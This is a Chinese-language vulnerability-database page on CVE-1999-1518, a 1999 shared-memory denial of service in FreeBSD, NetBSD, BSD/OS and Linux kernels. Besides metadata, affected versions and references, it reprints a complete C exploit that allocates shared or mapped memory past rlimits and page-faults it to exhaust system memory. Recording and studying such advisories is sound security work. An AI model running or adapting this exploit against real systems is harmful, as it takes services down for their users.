CVE-1999-1518
CVSS5.0
发布时间 :1999-07-15 00:00:00
修订时间 :2016-10-17 22:05:17
NMCOES    

[原文]Operating systems with shared memory implementations based on BSD 4.4 code allow a user to conduct a denial of service and bypass memory limits (e.g., as specified with rlimits) using mmap or shmget to allocate memory and cause page faults.


[CNNVD]多个供应商共享内存服务拒绝漏洞(CNNVD-199907-017)

        带有基于BSD 4.4代码的共享内存执行的操作系统存在漏洞。用户可以通过使用mmap或者shmget分配内存及导致页面错误进行服务拒绝以及绕过内存限制(如:按照带有rlimits的说明)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:freebsd:freebsd:2.1.7.1FreeBSD 2.1.7.1
cpe:/o:freebsd:freebsd:2.0.5FreeBSD 2.0.5
cpe:/o:freebsd:freebsd:2.2.3FreeBSD 2.2.3
cpe:/o:netbsd:netbsd:1.4::x86
cpe:/o:freebsd:freebsd:2.2.2FreeBSD 2.2.2
cpe:/o:freebsd:freebsd:2.1.0FreeBSD 2.1.0
cpe:/o:netbsd:netbsd:1.3.3NetBSD 1.3.3
cpe:/o:netbsd:netbsd:1.3.2NetBSD 1.3.2
cpe:/o:netbsd:netbsd:1.3.1NetBSD 1.3.1
cpe:/o:freebsd:freebsd:2.1.6FreeBSD 2.1.6
cpe:/o:freebsd:freebsd:2.2.5FreeBSD 2.2.5
cpe:/o:freebsd:freebsd:3.1FreeBSD 3.1
cpe:/o:freebsd:freebsd:1.1.5.1FreeBSD 1.1.5.1
cpe:/o:freebsd:freebsd:2.1.5FreeBSD 2.1.5
cpe:/o:freebsd:freebsd:2.2.4FreeBSD 2.2.4
cpe:/o:freebsd:freebsd:3.2FreeBSD 3.2
cpe:/o:freebsd:freebsd:2.0FreeBSD 2.0
cpe:/o:freebsd:freebsd:2.2.6FreeBSD 2.2.6
cpe:/o:freebsd:freebsd:3.0FreeBSD 3.0
cpe:/o:freebsd:freebsd:2.2.8FreeBSD 2.2.8

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1518
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1518
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-017
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=93207728118694&w=2
(UNKNOWN)  BUGTRAQ  19990715 Shared memory DoS's
http://www.securityfocus.com/bid/526
(VENDOR_ADVISORY)  BID  526
http://xforce.iss.net/static/2351.php
(VENDOR_ADVISORY)  XF  bsd-shared-memory-dos(2351)

- 漏洞信息

多个供应商共享内存服务拒绝漏洞
中危 设计错误
1999-07-15 00:00:00 2005-10-20 00:00:00
远程※本地  
        带有基于BSD 4.4代码的共享内存执行的操作系统存在漏洞。用户可以通过使用mmap或者shmget分配内存及导致页面错误进行服务拒绝以及绕过内存限制(如:按照带有rlimits的说明)。

- 公告与补丁

        Mike Perry provided a patch for the linux login binary for a related memory leak in his bugtraq posting. It is available in the message linked to in the credit section of this vulnerability entry.
        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (19423)

BSD/OS <= 4.0,FreeBSD <= 3.2,Linux kernel <= 2.3,NetBSD <= 1.4 Shared Memory Denial of Service Vulnerability (EDBID:19423)
multiple dos
1999-07-15 Verified
0 Mike Perry
N/A [点击下载]
source: http://www.securityfocus.com/bid/526/info

Operating systems with a shared memory implementation based on or influenced by the 4.4BSD code may be vulnerable to a denial of service attack The problem exists because you can mmap() or shmget() as much memory as you'd like bypassing rlimits. When you trigger pagefaults, the system will begin allocating the memory (it's not actually allocated at first) and run out. With System V IPC the memory remains allocated even after the process has stopped running.

/*
 * This program can be used to exploit DoS bugs in the VM systems or utility
 * sets of certain OS's.
 *
 * Common problems:
 * 1. The system does not check rlimits for mmap and shmget (FreeBSD)
 * 2. The system never bothers to offer the ability to set the rlimits for
 *    virtual memory via shells, login process, or otherwise. (Linux)
 * 3. b. The system does not actually allocate shared memory until a page fault
 *       is triggered (this could be argued to be a feature - Linux, *BSD)
 *    a. The system does not watch to make sure you don't share more memory 
 *       than exists. (Linux, Irix, BSD?)
 * 4. With System V IPC, shared memory persists even after the process is
 *    gone. So even though the kernel may kill the process after it exhausts all
 *    memory from page faults, there still is 0 memory left for the system.
 *    (All)
 *
 * This program should compile on any architecture. SGI Irix is not
 * vulnerable. From reading The Design and Implementation of 4.4BSD it sounds
 * as if the BSDs should all be vulnerable. FreeBSD will mmap as much memory
 * as you tell it. I haven't tried page faulting the memory, as the system is
 * not mine. I'd be very interested to hear about OpenBSD...
 *
 * This program is provided for vulnerability evaluation ONLY. DoS's aren't
 * cool, funny, or anything else. Don't use this on a machine that isn't
 * yours!!!
 */
#include <stdio.h>
#include <errno.h>
#include <sys/ipc.h>
#include <sys/shm.h> /* redefinition of LBA.. PAGE_SIZE in both cases.. */
#ifdef __linux__
#include <asm/shmparam.h>
#include <asm/page.h>
#endif
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/fcntl.h>
#include <sys/mman.h>

int len;

#define __FUXX0R_MMAP__

/* mmap also implements the copy-on-fault mechanism, but because the only way
 * to easily exploit this is to use anonymous mappings, once the kernel kills
 * the offending process, you can recover. (Although swap death may still
 * occurr */
/* #define __FUXX0R_MMAP__ */

/* Most mallocs use mmap to allocate large regions of memory. */
/* #define __FUXX0R_MMAP_MALLOC__ */


/* Guess what this option does :) */
#define __REALLY_FUXX0R__  

/* From glibc 2.1.1 malloc/malloc.c */
#define DEFAULT_MMAP_THRESHOLD (128 * 1024) 

#ifndef PAGE_SIZE
# define PAGE_SIZE 4096
#endif

#ifndef SHMSEG
# define SHMSEG 256
#endif

#if defined(__FUXX0R_MMAP_MALLOC__)
void *mymalloc(int n)
{
    if(n <= DEFAULT_MMAP_THRESHOLD)
	n = DEFAULT_MMAP_THRESHOLD + 1;
    return malloc(n);
}

void myfree(void *buf)
{
    free(buf);
}
#elif defined(__FUXX0R_MMAP__)
void *mymalloc(int n)
{
    int fd;
    void *ret;
    fd = open("/dev/zero", O_RDWR);
    ret = mmap(0, n, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
    close(fd);
    return (ret == (void *)-1 ? NULL : ret);
}
void myfree(void *buf)
{
    munmap(buf, len);
}

#elif defined(__FUXX0R_SYSV__)
void *mymalloc(int n)
{
    char *buf;
    static int i = 0;
    int shmid;
    i++; /* 0 is IPC_PRIVATE */
    if((shmid = shmget(i, n, IPC_CREAT | SHM_R | SHM_W)) == -1)
    {
#if defined(__irix__)
    	if (shmctl (shmid, IPC_RMID, NULL))
	{
	    perror("shmctl");
	}
#endif
	
	return NULL;	
    }
    if((buf = shmat(shmid, 0, 0)) == (char *)-1)
    {
#if defined(__irix__)
    	if (shmctl (shmid, IPC_RMID, NULL))
	{
	    perror("shmctl");
	}
#endif
	return NULL;
    }

#ifndef __REALLY_FUXX0R__
    if (shmctl (shmid, IPC_RMID, NULL))
    {
	perror("shmctl");
    }
#endif

    return buf;
}

void myfree(void *buf)
{
    shmdt(buf);
}
#endif

#ifdef __linux__
void cleanSysV()
{
    struct shmid_ds shmid;
    struct shm_info shm_info;
    int id;
    int maxid;
    int ret;
    int shid;
    maxid = shmctl (0, SHM_INFO, (struct shmid_ds *) &shm_info);
    printf("maxid %d\n", maxid);
    for (id = 0; id <= maxid; id++) 
    {
	if((shid = shmctl (id, SHM_STAT, &shmid)) < 0)
	    continue;

	if (shmctl (shid, IPC_RMID, NULL))
	{
	    perror("shmctl");
	}
	printf("id %d has %d attachments\n", shid, shmid.shm_nattch);
	shmid.shm_nattch = 0;
	shmctl(shid, IPC_SET, &shmid);
	if(shmctl(shid, SHM_STAT, &shmid) < 0)
	{
	    printf("id %d deleted sucessfully\n", shid);
	}
	else if(shmid.shm_nattch == 0)
	{
	    printf("Still able to stat id %d, but has no attachments\n", shid);
	}
	else
	{
	    printf("Error, failed to remove id %d!\n", shid);
	}	

    }
}
#endif

int main(int argc, char **argv)
{
    int shmid;
    int i = 0;
    char *buf[SHMSEG * 2];
    int max;
    int offset;
    if(argc < 2)
    {
	printf("Usage: %s <[0x]size of segments>\n", argv[0]);
#ifdef __linux__
	printf("    or %s --clean (destroys all of IPC space you have permissions to)\n", argv[0]);
#endif
	exit(0);
    }

#ifdef __linux__
    if(!strcmp(argv[1], "--clean"))
    {
	cleanSysV();
	exit(0);
    }
#endif 
    
    len = strtol(argv[1], NULL, 0);
    for(buf[i] = mymalloc(len); i < SHMSEG * 2 && buf[i] != NULL; buf[++i] = mymalloc(len))
	;

    max = i;
    perror("Stopped because");
    printf("Maxed out at %d %d byte segments\n", max, len);
#if defined(__FUXX0R_SYSV__) && defined(SHMMNI)
    printf("Despite an alleged max of %d (%d per proc) %d byte segs. (Page "
	    "size: %d), \n", SHMMNI, SHMSEG, SHMMAX,  PAGE_SIZE); 
#endif
    
#ifdef __REALLY_FUXX0R__
    fprintf(stderr, "Page faulting alloced region... Have a nice life!\n");
    for(i = 0; i < max; i++)
    {
	for(offset = 0; offset < len; offset += PAGE_SIZE)
	{
	    buf[i][offset] = '*';
	}
	printf("wrote to %d byes of memory, final offset %d\n", len, offset);
    }
    // never reached :(
#else
    for(i = 0; i <= max; i++)
    {
	myfree(buf[i]);
    }
#endif
    exit(42);
}

		

- 漏洞信息

13553
Multiple Unix Vendor BSD Based Memory Implementation Memory Limits Bypass
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1999-07-16 Unknow
1999-07-16 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor Shared Memory Denial of Service Vulnerability
Design Error 526
Yes Yes
1999-07-15 12:00:00 2009-07-11 12:56:00
First posted to BugTraq by Mike Perry <mikepery@mikepery.linuxos.org> on July 15, 1999.

- 受影响的程序版本

NetBSD NetBSD 1.4 x86
NetBSD NetBSD 1.3.3
NetBSD NetBSD 1.3.2
NetBSD NetBSD 1.3.1
Linux kernel 2.3
Linux kernel 2.2
Linux kernel 2.1
Linux kernel 2.0.37
Linux kernel 2.0.34
Linux kernel 2.0.33
Linux kernel 2.0
FreeBSD FreeBSD 3.2
FreeBSD FreeBSD 3.1
FreeBSD FreeBSD 3.0
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 2.1.7 .1
FreeBSD FreeBSD 2.1.6
FreeBSD FreeBSD 2.1.5
FreeBSD FreeBSD 2.1
FreeBSD FreeBSD 2.0.5
FreeBSD FreeBSD 2.0
FreeBSD FreeBSD 1.1.5 .1
BSDI BSD/OS 4.0
BSDI BSD/OS 3.0
BSDI BSD/OS 2.1
BSDI BSD/OS 2.0.1
BSDI BSD/OS 1.1

- 漏洞讨论

Operating systems with a shared memory implementation based on or influenced by the 4.4BSD code may be vulnerable to a denial of service attack The problem exists because you can mmap() or shmget() as much memory as you'd like bypassing rlimits. When you trigger pagefaults, the system will begin allocating the memory (it's not actually allocated at first) and run out. With System V IPC the memory remains allocated even after the process has stopped running.

- 漏洞利用

x

- 解决方案

Mike Perry <mikepery@mikepery.linuxos.org> provided a patch for the linux login binary for a related memory leak in his bugtraq posting. It is available in the message linked to in the credit section of this vulnerability entry.

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站